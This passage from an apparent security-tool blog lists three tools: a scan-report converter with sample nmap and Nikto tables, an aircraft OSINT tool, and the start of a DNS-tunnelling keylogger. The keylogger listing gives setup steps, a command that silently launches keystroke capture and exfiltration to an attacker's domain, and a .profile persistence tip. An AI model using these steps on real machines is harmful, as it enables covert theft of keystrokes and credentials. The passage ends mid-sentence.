/>+-----------------+------+-------+---------------+-------+<br />| ip address | port | proto | service | state |<br />+--------------- --+------+-------+---------------+-------+<br />| 192.168.23.78 | 53 | tcp | domain | open |<br />| 192.168.23.78 | 88 | tcp | kerberos-sec | open |<br />| 192.168.23.78 | 135 | tcp | msrpc | open |<br />| 192.168.23.78 | 139 | tcp | netbios-ssn | open |<br />| 192.168.23.78 | 389 | tcp | ldap | open |<br />| 192.168.23.78 | 445 | tcp | microsoft-ds | open |<br />| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.27.243 | 135 | tcp | msrpc | open |<br />| 192.168.27.243 | 139 | tcp | netbios-ssn | open |<br />| 192.168.27.243 | 445 | tcp | microsoft-ds | open |<br />| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.27.243 | 5800 | tcp | vnc-http | open |<br />| 192.168.27.243 | 5900 | tcp | vnc | open |<br />| 192.168.99.164 | 135 | tcp | msrpc | open |<br />| 192.168.99.164 | 139 | tcp | netbios-ssn | open |<br />| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |<br />| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.99.164 | 5800 | tcp | vnc-http | open |<br />| 192.168.99.164 | 5900 | tcp | vnc | open |<br />| 192.168.228.211 | 80 | tcp | http | open |<br />| 192.168.171.74 | 135 | tcp | msrpc | open |<br />| 192.168.171.74 | 139 | tcp | netbios-ssn | open |<br />| 192.168.171.74 | 445 | tcp | microsoft-ds | open |<br />| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |<br />| 192.168.171.74 | 5800 | tcp | vnc-http | open |<br />| 192.168.171.74 | 5900 | tcp | vnc | open |<br />+-----------------+------+-------+---------------+-------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --nmap example/nmap.xml -oC example<br />$ cat example_nmap_tcp.csv<br />ip address,53,80,88,135,139,389,445,3389,5800,5900<br />192.168.23.78,X,,X,X,X,X,X,X,,<br />192.168.27.243,,,,X,X,,X,X,X,X<br />192.168.99.164,,,,X,X,,X,X,X,X<br />192.168.228.211,,X,,,,,,,,<br />192.168.171.74,,,,X,X,,X,X,X,X<br /></code></pre> <h3>Nikto</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgpqjTaSiVpzx7ChR8m36af20pM3HHMBGsW9Tn5paxwXM1qjr16w9sJQy7o2xD-CVKAGEVpj42mW9xATzag9zhqyAWmD-_KI_rq7SiDlVT5SQtZK1gwVmaQPwWsI3tR8xCfpNBrfP-NvjLRuNsJ7W7Q0eI9Ekn5zZLvb5EYZknNNwjcOj-BAUXDCYjYGVg"><img alt="" border="0" height="376" id="BLOGGER_PHOTO_ID_7348941247672650594" src="https://blogger.googleusercontent.com/img/a/AVvXsEgpqjTaSiVpzx7ChR8m36af20pM3HHMBGsW9Tn5paxwXM1qjr16w9sJQy7o2xD-CVKAGEVpj42mW9xATzag9zhqyAWmD-_KI_rq7SiDlVT5SQtZK1gwVmaQPwWsI3tR8xCfpNBrfP-NvjLRuNsJ7W7Q0eI9Ekn5zZLvb5EYZknNNwjcOj-BAUXDCYjYGVg=w640-h376" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --nikto example/nikto.xml<br />+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+<br />| target ip | target hostname | target port | description | annotations |<br />+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+<br />| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |<br />| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |<br />| | | | agent to protect against some forms of XSS | |<br />| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |<br />| | | | render the content of the site in a different fashion to the MIME type | |<br />+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --nikto example/nikto.xml -oC example<br />$ cat example_nikto.csv<br />target ip,target hostname,target port,description,annotations<br />192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X<br />192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user<br />agent to protect against some forms of XSS",X<br />192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to<br />render the content of the site in a different fashion to the MIME type",X<br /></code></pre> <h3>Dirble</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --dirble example/dirble.xml -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjEXQecLHyepfW-ywWo7JjssmDT8ElMuToGZURqa1tob7HnPT8PiYm3goWz4FreDyQktj4KK9D5czpHn5_-PbiOweInsQqm7G1_nXPuPwD050LOE1DZN27aZe3Zfwd6MZ5f9LF33cqzzF7JJGrGai9c7LTXQpsH82zWMeIG-ROcQNv_-J5W9qrNu4qYL00"><img alt="" border="0" height="302" id="BLOGGER_PHOTO_ID_7348941248701865586" src="https://blogger.googleusercontent.com/img/a/AVvXsEjEXQecLHyepfW-ywWo7JjssmDT8ElMuToGZURqa1tob7HnPT8PiYm3goWz4FreDyQktj4KK9D5czpHn5_-PbiOweInsQqm7G1_nXPuPwD050LOE1DZN27aZe3Zfwd6MZ5f9LF33cqzzF7JJGrGai9c7LTXQpsH82zWMeIG-ROcQNv_-J5W9qrNu4qYL00=w640-h302" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --dirble example/dirble.xml<br />+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+<br />| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |<br />+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+<br />| http://example.org/flv | 0 | 0 | false | false | false | | X |<br />| http://example.org/hire | 0 | 0 | false | false | false | | X |<br />| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |<br />| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |<br />| http://example.org/putty | 0 | 0 | false | false | false | | X |<br />| http://example.org/receipts | 0 | 0 | false | false | false | | X |<br />+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --dirble example/dirble.xml -oC example<br />$ cat example_dirble.csv<br />url,code,content len,is directory,is listable,found from listable,redirect url,annotations<br />http://example.org/flv,0,0,false,false,false,,X<br />http://example.org/hire,0,0,false,false,false,,X<br />http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X<br />http://example.org/print_order,0,0,false,false,false,,X<br />http://example.org/putty,0,0,false,false,false,,X<br />http://example.org/receipts,0,0,false,false,false,,X<br /><br /></code></pre> <h3>Testssl</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --testssl example/testssl.json -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhRORk3DLTkf-buGgFxAU52BcXDVsuTU9AoKnp7USUeM-hNFLr5opEuH5P7QgOLTrexKfJmtWJ99zHpGmzhT1pWUFuQnn06JzN11xivAS-Bj2l2koyo1uugWMZl1q00ilpDfU1MymqAr7GUZIgeZJGaTwrOaPjueF4p7rvy51MmyL3pNqFDpc6Y2UmS4ns"><img alt="" border="0" height="376" id="BLOGGER_PHOTO_ID_7348941251753286482" src="https://blogger.googleusercontent.com/img/a/AVvXsEhRORk3DLTkf-buGgFxAU52BcXDVsuTU9AoKnp7USUeM-hNFLr5opEuH5P7QgOLTrexKfJmtWJ99zHpGmzhT1pWUFuQnn06JzN11xivAS-Bj2l2koyo1uugWMZl1q00ilpDfU1MymqAr7GUZIgeZJGaTwrOaPjueF4p7rvy51MmyL3pNqFDpc6Y2UmS4ns=w640-h376" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --testssl example/testssl.json<br />+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+<br />| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |<br />+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+<br />| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |<br />+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --testssl example/testssl.json -oC example<br />$ cat example_testssl.csv<br />ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard<br />rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X<br /></code></pre> <h3>Fortify</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --fortify example/fortify.fpr -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhRfNZVvo_QzWDxX7C9IPx7NbYK6OtHYc_sCIS_Q757juJ3-DGUaLPKpMaciwfmWHUa1HODv4mnB1-4bN_Ic2rhE72pvOwXo0x0kpjNq_hQr3ZQDIl7vsbjgiFIajsnYGSDPw3YJEAaw_Sl7dbKRt7aAbRSASN-bQ82LYkqrcqCgEymZ87npNcxnkGFsdA"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941254587723954" src="https://blogger.googleusercontent.com/img/a/AVvXsEhRfNZVvo_QzWDxX7C9IPx7NbYK6OtHYc_sCIS_Q757juJ3-DGUaLPKpMaciwfmWHUa1HODv4mnB1-4bN_Ic2rhE72pvOwXo0x0kpjNq_hQr3ZQDIl7vsbjgiFIajsnYGSDPw3YJEAaw_Sl7dbKRt7aAbRSASN-bQ82LYkqrcqCgEymZ87npNcxnkGFsdA=w640-h334" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --fortify example/fortify.fpr<br />+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+<br />| | type | subtype | severity | confidence | annotations |<br />+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+<br />| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |<br />| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |<br />| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |<br />| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |<br />| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |<br />| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |<br />| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |<br />+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --fortify example/fortify.fpr -oC example<br />$ cat example_fortify.csv<br />,type,subtype,severity,confidence,annotations<br />example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X<br />example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X<br />example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X<br />example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X<br />example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X<br />example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X<br />example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X<br /></code></pre> <h2>Donate</h2> <ul> <li>WOW: <code>WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp</code></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/0bs1d1an/sr2t" rel="nofollow" target="_blank" title="Download Sr2T">Download Sr2T</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-34742759548209010072024-03-22T08:30:00.011-03:002024-03-22T08:30:00.129-03:00Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg06aKoszBH407ZGXGJ6AqjMD10YhOqN26u9MEmr3e6ntZC84dUmm6V7_BljogGYzM52s6uctbcnq__WtMSTZDft7H_0-oLiyvknNhSFHH4ZFJHbXx1i-fExgKAullS1BnlKEUndVoH6tza8yn4nBK12LfkGox4V4y1ohev2M45cpKBVHd9FdhY9ko7j2A"><img alt="" border="0" height="360" id="BLOGGER_PHOTO_ID_7348938031430712770" src="https://blogger.googleusercontent.com/img/a/AVvXsEg06aKoszBH407ZGXGJ6AqjMD10YhOqN26u9MEmr3e6ntZC84dUmm6V7_BljogGYzM52s6uctbcnq__WtMSTZDft7H_0-oLiyvknNhSFHH4ZFJHbXx1i-fExgKAullS1BnlKEUndVoH6tza8yn4nBK12LfkGox4V4y1ohev2M45cpKBVHd9FdhY9ko7j2A=w640-h360" width="640" /></a></p> <h2>About</h2> <p></p><p>skytrack is a command-line based plane spotting and aircraft OSINT <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> tool made using Python. It can gather aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose <a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a>.</p><span><a name='more'></a></span><p><br /></p><h2>What is Planespotting & Aircraft OSINT?</h2> <p></p><p>Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicy accessible data sources to obtain data about a specific subject β in this case planes!</p><h2>Aircraft Information</h2> <ul> <li>Tail Number π«</li> <li>Aircraft Type βοΈ</li> <li>ICAO24 Designation π</li> <li>Manufacturer Details π </li> <li>Flight Logs π </li> <li>Aircraft Owner βοΈ</li> <li>Model π©</li> <li>Much more!</li> </ul> <h2>Usage</h2> <p>To run skytrack on your machine, follow the steps below:</p> <pre><code>$ git clone https://github.com/ANG13T/skytrack<br />$ cd skytrack<br />$ pip install -r requirements.txt<br />$ python skytrack.py<br /></code></pre> <p>skytrack works best for Python version 3.</p> <h2>Preview</h2> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhKVVZW7_ROkae7ba9kKQekXul_bLeCorY9LbyXd0Y1Ueu0X63alUJgdhg9W0n4MCNX2m7aQg8ykaWllPE4PA57E6WAO68MTOFmrrHdJhlEKnqNxm5D7g2vOLJcp0VALZJm0_yaD_BrWnxWO-KkoBnMfGcyLyuDYkzlT06aUWe_0pfnFqsunJ-aqCDJWHw"><img alt="" border="0" height="614" id="BLOGGER_PHOTO_ID_7348938037852268914" src="https://blogger.googleusercontent.com/img/a/AVvXsEhKVVZW7_ROkae7ba9kKQekXul_bLeCorY9LbyXd0Y1Ueu0X63alUJgdhg9W0n4MCNX2m7aQg8ykaWllPE4PA57E6WAO68MTOFmrrHdJhlEKnqNxm5D7g2vOLJcp0VALZJm0_yaD_BrWnxWO-KkoBnMfGcyLyuDYkzlT06aUWe_0pfnFqsunJ-aqCDJWHw=w640-h614" width="640" /></a></p> <h2>Features</h2> <p></p><p>skytrack features three main functions for aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a></p><a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> and display options. They include the following: <h3>Aircraft Reconnaissance & OSINT</h3> <p></p><p>skytrack obtains general <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> about the aircraft given its tail number or ICAO designator. The tool sources this <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiW_SBDKshIG6h5spWbtgUm6RYnJsOnffIywYIHlt1JQRW81RQPia-qarLDLnYIwkgNFWHoCljb-CBXM3-E7i74ytzeuP2odo7jR4fWfgtlZMeyGl89GWSTXtOzqbalL2ISF2-XJJQ76QjEFL0T4IGmP9I8i9qBdczHKvcqhq7Ay77_O9hvrGwrcfXRnCY"><img alt="" border="0" height="322" id="BLOGGER_PHOTO_ID_7348938043904086818" src="https://blogger.googleusercontent.com/img/a/AVvXsEiW_SBDKshIG6h5spWbtgUm6RYnJsOnffIywYIHlt1JQRW81RQPia-qarLDLnYIwkgNFWHoCljb-CBXM3-E7i74ytzeuP2odo7jR4fWfgtlZMeyGl89GWSTXtOzqbalL2ISF2-XJJQ76QjEFL0T4IGmP9I8i9qBdczHKvcqhq7Ay77_O9hvrGwrcfXRnCY=w640-h322" width="640" /></a> </p> <h3>PDF Aircraft Information Report</h3> <p></p><p>skytrack also enables you the save the collected aircraft <a href="https://www.kitploit.com/search/label/Information" target="_blank" title="information">information</a> into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf"</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj3eIcJehI8_CXB-71pZDe-oWZB74QiDZ_eBj9OfarIjViHX2IjE9Nd7VWGFp4Eovzf7zN0z9o6aziHYVDvEOGXb80Ojh3JsLfKTTVrjwj7StWGDOmyh5dbOyYPOn2VbCpSVG3ZRJ716FfJ82gLrQSJN8v9B-m61D1ndEHGZquw2lsbx8rif1bF34RY2Co"><img alt="" border="0" height="486" id="BLOGGER_PHOTO_ID_7348938049802659218" src="https://blogger.googleusercontent.com/img/a/AVvXsEj3eIcJehI8_CXB-71pZDe-oWZB74QiDZ_eBj9OfarIjViHX2IjE9Nd7VWGFp4Eovzf7zN0z9o6aziHYVDvEOGXb80Ojh3JsLfKTTVrjwj7StWGDOmyh5dbOyYPOn2VbCpSVG3ZRJ716FfJ82gLrQSJN8v9B-m61D1ndEHGZquw2lsbx8rif1bF34RY2Co=w640-h486" width="640" /></a></p> <h3>Tail Number to ICAO Converter</h3> <p></p><p></p><p>There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the <a href="https://www.kitploit.com/search/label/Hexadecimal" target="_blank" title="hexadecimal">hexadecimal</a> format. Both standards are highly pertinent for aircraft </p><a href="https://www.kitploit.com/search/label/Reconnaissance" target="_blank" title="reconnaissance">reconnaissance</a> as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter. <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhOBHxVw8vjG139sIzpyCvYaon0qagl7-orCsD2c8NDdI1zOVsJQLk60Ri5ODxPbeqNEZtAyiFFPnSrMGUEUdHyHguk784H5dWR3Zj6yRtstRp4jCyTWHCk_eZbs_LrdIHLEsOcwkQN_bvcA7lIrn_M18kar5wzGbeodlEQRTgU0chCm_-oq87NIF-Odlk"><img alt="" border="0" height="170" id="BLOGGER_PHOTO_ID_7348938054443560786" src="https://blogger.googleusercontent.com/img/a/AVvXsEhOBHxVw8vjG139sIzpyCvYaon0qagl7-orCsD2c8NDdI1zOVsJQLk60Ri5ODxPbeqNEZtAyiFFPnSrMGUEUdHyHguk784H5dWR3Zj6yRtstRp4jCyTWHCk_eZbs_LrdIHLEsOcwkQN_bvcA7lIrn_M18kar5wzGbeodlEQRTgU0chCm_-oq87NIF-Odlk=w640-h170" width="640" /></a></p> <details> <summary><bold>Further Explanation</bold></summary> <br /> <p>ICAO and Tail Numbers follow a mapping system like the following:</p> <p>ICAO address N-Number (Tail Number)</p> <p>a00001 N1</p> <p>a00002 N1A</p> <p>a00003 N1AA</p> You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers) </details> <blockquote> <p></p><p>:warning: <a href="https://www.kitploit.com/search/label/Converter" target="_blank" title="Converter">Converter</a> only works for USA-registered aircraft</p> </blockquote> <h2>Data Sources & APIs Used</h2> <p><a href="https://www.icao.int/publications/doc8643/pages/search.aspx" rel="nofollow" target="_blank" title="ICAO Aircraft Type Designators Listings">ICAO Aircraft Type Designators Listings</a></p> <p><a href="https://github.com/ANG13T/flightaware.com" rel="nofollow" target="_blank" title="FlightAware">FlightAware</a></p> <p><a href="https://github.com/ANG13T/wikipedia.org" rel="nofollow" target="_blank" title="Wikipedia">Wikipedia</a></p> <p><a href="https://aviation-safety.net" rel="nofollow" target="_blank" title="Aviation Safety Website">Aviation Safety Website</a></p> <p><a href="https://www.jetphotos.com" rel="nofollow" target="_blank" title="Jet Photos Website">Jet Photos Website</a></p> <p><a href="https://opensky-network.org/datasets/metadata/aircraftDatabase.csv" rel="nofollow" target="_blank" title="OpenSky API">OpenSky API</a></p> <p><a href="https://aviationweather.gov" rel="nofollow" target="_blank" title="Aviation Weather METAR">Aviation Weather METAR</a></p> <p><a href="https://pkgstore.datahub.io/core/airport-codes/airport-codes/archive/dfadb79d7ba34a49242332f2eaf4f1b0/airport-codes.csv" rel="nofollow" target="_blank" title="Airport Codes Dataset">Airport Codes Dataset</a></p> <h2>Contributing</h2> <p>skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.</p> <h2>Upcoming</h2> <ul> <li>Obtain Latest Flown Airports</li> <li>Obtain Airport Information</li> <li>Obtain ATC Frequency Information</li> </ul> <h2>Support</h2> <p>If you enjoyed skytrack, please consider <a href="https://github.com/sponsors/ANG13T" rel="nofollow" target="_blank" title="becoming a sponsor">becoming a sponsor</a> or donating on <a href="https://www.buymeacoffee.com/angelinatsuboi" rel="nofollow" target="_blank" title="buymeacoffee">buymeacoffee</a> in order to fund my future projects. </p> <p>To check out my other works, visit my <a href="https://github.com/ANG13T" rel="nofollow" target="_blank" title="GitHub profile">GitHub profile</a>.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ANG13T/skytrack" rel="nofollow" target="_blank" title="Download Skytrack">Download Skytrack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-55233407003411976452024-03-21T08:30:00.001-03:002024-03-21T08:30:00.131-03:00DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/s457/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="178" data-original-width="457" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/w640-h250/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" width="640" /></a></div><p><br /></p> <p>This <a href="https://www.kitploit.com/search/label/Post-Exploitation" target="_blank" title="post-exploitation">post-exploitation</a> keylogger will covertly exfiltrate <a href="https://www.kitploit.com/search/label/Keystrokes" target="_blank" title="keystrokes">keystrokes</a> to a server. </p> <p>These tools excel at lightweight <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.</p><span><a name='more'></a></span><p><br /></p> <h1>Server</h1> <h2>Setup</h2> <p>The server uses python3.</p> <p>To install dependencies, run <code>python3 -m pip install -r requirements.txt</code></p> <h2>Starting the Server</h2> <p>To start the server, run <code>python3 main.py</code></p> <pre><code>usage: dns exfiltration server [-h] [-p PORT] ip domain<br /><br />positional arguments:<br /> ip<br /> domain<br /><br />options:<br /> -h, --help show this help message and exit<br /> -p PORT, --port PORT port to listen on<br /></code></pre> <p>By default, the server listens on UDP port 53. Use the <code>-p</code> flag to specify a different port.</p> <p><code>ip</code> is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.</p> <p><code>domain</code> is the domain to listen for, which should be the domain that the server is authoritative for.</p> <h2>Registrar</h2> <p>On the registrar, you want to change your domain's namespace to custom DNS.</p> <p>Point them to two domains, <code>ns1.example.com</code> and <code>ns2.example.com</code>.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/s457/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="178" data-original-width="457" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-MbgnPNfgz9FUxSjMWOICT5WjlMECKLZ2jTAdJWKeuLbrRO2sLroiea4FI4jPuKmACSKB7fji-QYdYHwewWGVxcjweCDvCWroVw4j_Fvd1ONNIVdzyNK0pvMkfBGQurlbhDHPvlI5YafZGI2SZf_idJWkMGt0QaMP8du2XyJQIqRWbVdQ1XzzFQ8mngZ2/w640-h250/DNS-Tunnel-Keylogger_1_CustomNS_Screenshot1.png" width="640" /></a></p> <p>Add records that make point the namespace domains to your exfiltration server's IP address.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIzUQXx8D6TPxMJcpSXznc9STFc59Vaksk9l5e1dNiC6fpW5OKCr9KfAvyUtL_J3w_7rp5Tr1KKPdxV-uDN7fPmV0HAWXRoQv1na__MKmCBvz-2dPw2nfj530CukUJ0u5WbzRnJ0skljClT2faH63Q9ESTNaUlHPwQxg4o5J6lyjeB4n_peazuVEZNFSd/s1138/DNS-Tunnel-Keylogger_2_CustomNS_Screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="343" data-original-width="1138" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwIzUQXx8D6TPxMJcpSXznc9STFc59Vaksk9l5e1dNiC6fpW5OKCr9KfAvyUtL_J3w_7rp5Tr1KKPdxV-uDN7fPmV0HAWXRoQv1na__MKmCBvz-2dPw2nfj530CukUJ0u5WbzRnJ0skljClT2faH63Q9ESTNaUlHPwQxg4o5J6lyjeB4n_peazuVEZNFSd/w640-h192/DNS-Tunnel-Keylogger_2_CustomNS_Screenshot2.png" width="640" /></a></div> <p>This is the same as setting glue records.</p> <h1>Client</h1> <h2>Linux</h2> <p>The Linux keylogger is two bash scripts. <code>connection.sh</code> is used by the <code>logger.sh</code> script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the <code>connection.sh</code> script. It will automatically establish a connection and send the data.</p> <h3><code>logger.sh</code></h3> <pre><code># Usage: logger.sh [-options] domain<br /># Positional Arguments:<br /># domain: the domain to send data to<br /># Options:<br /># -p path: give path to log file to listen to<br /># -l: run the logger with warnings and errors printed<br /></code></pre> <p>To start the keylogger, run the command <code>./logger.sh [domain] && exit</code>. This will silently start the keylogger, and any inputs typed will be sent. The <code>&& exit</code> at the end will cause the shell to close on <code>exit</code>. Without it, exiting will bring you back to the non-keylogged shell. Remove the <code>&> /dev/null</code> to display error messages.</p> <p>The <code>-p</code> option will specify the location of the temporary log file where all the inputs are sent to. By default, this is <code>/tmp/</code>.</p> <p>The <code>-l</code> option will show warnings and errors. Can be useful for debugging.</p> <p><code>logger.sh</code> and <code>connection.sh</code> must be in the same directory for the keylogger to work. If you want persistance, you can add the command to <code>.profile</code> to start on every new interactive shell.</p> <h3><code>connection.sh</code></h3> <pre><code>Usage: command [-options] domain<br />Positional Arguments:<br /> domain: the domain to send data to<br />Options:<br /> -n: number of characters to store before sending a packet<br /></code></pre> <h2>Windows</h2> <h3>Build</h3> <p>To build <a href="https://www.kitploit.com/search/label/Keylogging" target="_blank" 